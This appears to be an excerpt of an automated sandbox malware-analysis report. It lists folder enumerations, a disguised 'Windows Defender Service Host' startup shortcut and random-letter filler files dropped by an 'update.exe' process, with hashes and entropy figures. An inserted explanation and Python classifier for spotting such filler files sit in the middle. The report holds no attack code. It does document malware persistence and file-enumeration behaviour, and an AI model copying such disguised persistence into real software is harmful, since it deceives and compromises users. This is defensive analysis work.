                                                  Preview:Desktop\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...BTC.exe...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...Excel.lnk...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):946
                                                  Entropy (8bit):5.374016320731802
                                                  Encrypted:false
                                                  SSDEEP:24:QJhXIYyFteIqxj38xrqEEnvj8zSYCZ9tDvupjucWjq:Q7XIYseIqxj38BqEEnQzSZZ9tDmpjulu
                                                  MD5:7ECFE495FA4D93F25F904F0648C039A2
                                                  SHA1:3153CAE93B272237914852A85357F744328099F9
                                                  SHA-256:A0BA8E7E4D12DA4A13DF2B425F2BD3D2C72CC94795F74E0E2284A7F8F3213FBC
                                                  SHA-512:804589825EC34F9C8B028295EC33BE926F41F0F31B9E2D9DBED3B452515170B78318C1F90BE97C28E9FFCE5DD31DBC6CE60BE2192AA64870FC220017A6C78CED
                                                  Malicious:false
                                                  Preview:Documents\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):338
                                                  Entropy (8bit):5.296247378390472
                                                  Encrypted:false
                                                  SSDEEP:6:3tcfL6LK0rcNCNWtrB/rvwuuth7kyRh7Wdtslddjgljif/upCWM08NV3:aj6LK0rcNuCt/rvwu6puGdejif/upCWu
                                                  MD5:278EAC32E0DD3806E5F3F391B184947F
                                                  SHA1:618EE22D5D93F252BCEF6EF802F1E97A36B0C445
                                                  SHA-256:788B0C56CAD0EDC8D5AA74B8A4AA971320E9DF9F5DD8602977AA2656096AE179
                                                  SHA-512:4F0386BB38707BF5442D0F5E1DB4B5ACE6A4AD49036FFEAFACF241ABDF2F2EEB15FF350DEC59AFB6BBF078D5288B6D161F46A05AB45956A0E19E05B5AD2A4F84
                                                  Malicious:false
                                                  Preview:Downloads\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.023465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                  Malicious:false
                                                  Preview:OneDrive\...desktop.ini..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):88
                                                  Entropy (8bit):4.450045114302317
                                                  Encrypted:false
                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                  Malicious:false
                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.5269908036173305
                                                  Encrypted:false
                                                  SSDEEP:3:jgBLKSyA7V2AXAHKMJDv:j4LKSyA7VEKMJz
                                                  MD5:962BA2F38107171F546032264F2B3A87
                                                  SHA1:E6836B31DF2F3DE53E5534714D5142ED784ED4B4
                                                  SHA-256:87ECB05FFD7E3140524EAC373C7DD948030312DCFE2AA2B1B6ED9ED82A644EFA
                                                  SHA-512:01CE72E1DC2E9FA0F9A79C873885738114B842E92789AE7A4C9474894CAF7F5A86B1AC5F4B5D02D3F240B9D4921E2A89E85D14CB8A39D0FAE4F771F03573AE71
                                                  Malicious:false
                                                  Preview:Startup\...desktop.ini...Windows Defender Service Host.lnk..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4403
                                                  Entropy (8bit):5.190546922929315
                                                  Encrypted:false
                                                  SSDEEP:96:4tiCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA03MjssMaLTjg/uZ9FGVpd0q:LYfa2fSASOpgu9nI0kjMC1GA08As5vLs
                                                  MD5:57F2274700E72465206D8890E8E1E8CF
                                                  SHA1:CE7893A55E77079654F4746DBEBED5C089DEB55D
                                                  SHA-256:6E03DB17AA0B035022980F9EDE70F34AC3C7D653C275571B2B2F42C174AA8153
                                                  SHA-512:C2EC4CD2B55F2915CE1764CE8A34A831A6173ED89F82CFC1ECFCA41BF2C092212DD8E2818B3DDC1BBD099D31CBF467FF179D4EDC71EB904CC053E65735EA5BDB
                                                  Malicious:false
                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_6440_1191663050\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6440_1234978473\....1187695d-8276-4e31-8de1-9e57768989bd...edge_BITS_6440_1289371347\....78549187-a875-4f1e-8dfa-9938ebc29c81...edge_BITS_6440_1318414972\....873489b1-33b2-480a-baa2-641b9e09edcd...ed
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):23
                                                  Entropy (8bit):3.7950885863977324
                                                  Encrypted:false
                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                  Malicious:false
                                                  Preview:Videos\...desktop.ini..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                   Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                   Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                   Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO
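The dropped-file records above share one shape: 1026-byte ASCII files of 1024 uppercase letters plus CRLF, written by update.exe, reported as Encrypted:false with an 8-bit entropy of 4.69 to 4.70. That entropy is exactly what uniformly random draws over the 26 letters A-Z produce (log2(26) is about 4.70), so these are random-letter filler rather than encrypted payloads. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses a record in the report's Key:Value layout, recomputes the entropy the way the Entropy (8bit) field measures it, and classifies the content. The record text, the filler content and the high-entropy comparison bytes are all constructed for the example; the 0.05-bit tolerance and the 7.5-bit threshold are assumptions chosen for illustration.

```python
import math
import random
import re
from collections import Counter

# Entropy of uniformly random uppercase letters; the report's 4.69-4.70 values sit here.
LOG2_26 = math.log2(26)

# Exact shape of the update.exe drops listed in the report: 1024 letters + CRLF = 1026 bytes.
FILLER_RE = re.compile(rb"\A[A-Z]{1024}\r\n\Z")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the measure behind 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_record(text: str) -> dict:
    """Parse one dropped-file record in the report's 'Key:Value' line layout."""
    rec = {}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        if sep:
            rec[key.strip()] = val.strip()
    return rec


def classify_dropped_file(record: dict, content: bytes) -> str:
    """
    'random-letter filler' needs all of: the 1026-byte A-Z+CRLF shape, a measured
    entropy within 0.05 bit of log2(26) (assumed tolerance), and agreement with the
    entropy the record reports. Content near 8 bits/byte is what packed or
    encrypted data looks like; 7.5 is an assumed threshold for that case.
    """
    size = int(record.get("Size (bytes)", len(content)))
    measured = shannon_entropy(content)
    reported = float(record.get("Entropy (8bit)", measured))
    if (size == 1026 and FILLER_RE.match(content)
            and abs(measured - LOG2_26) < 0.05 and abs(measured - reported) < 0.01):
        return "random-letter filler"
    if measured > 7.5:
        return "high-entropy (packed or encrypted)"
    return "other"


def make_filler(seed: int) -> bytes:
    """Constructed sample content: 1024 uppercase letters + CRLF, like the report's files."""
    rng = random.Random(seed)
    letters = "".join(rng.choice("ABCDEFGHIJKLMNOPQRSTUVWXYZ") for _ in range(1024))
    return letters.encode("ascii") + b"\r\n"


def make_random_bytes(seed: int, n: int = 1026) -> bytes:
    """Constructed comparison content: n uniformly random bytes (what ciphertext looks like)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


def sample_record(content: bytes) -> dict:
    """Constructed record in the report's field layout; the entropy field is computed."""
    text = (
        "Process:C:\\Users\\user\\AppData\\Roaming\\update.exe\n"
        "File Type:ASCII text, with very long lines (1024), with CRLF line terminators\n"
        "Category:dropped\n"
        f"Size (bytes):{len(content)}\n"
        f"Entropy (8bit):{shannon_entropy(content)}\n"
        "Encrypted:false\n"
        "Malicious:false\n"
    )
    return parse_record(text)


if __name__ == "__main__":
    for label, blob in (("filler", make_filler(1)), ("random bytes", make_random_bytes(1))):
        rec = sample_record(blob)
        print(f"{label:12s} size={rec['Size (bytes)']} "
              f"entropy={float(rec['Entropy (8bit)']):.4f} -> {classify_dropped_file(rec, blob)}")
```

The measured entropy of a 1026-byte filler file lands a few hundredths below log2(26) because 1024 draws do not hit every letter equally often and the two CRLF bytes are rare symbols, which is why the report's values scatter between 4.687 and 4.704 instead of all reading 4.7004. A triage rule keyed on the three conditions together (size, byte-class shape, entropy band) will not fire on a genuinely encrypted 1026-byte blob, whose entropy approaches 8 bits per byte.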
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
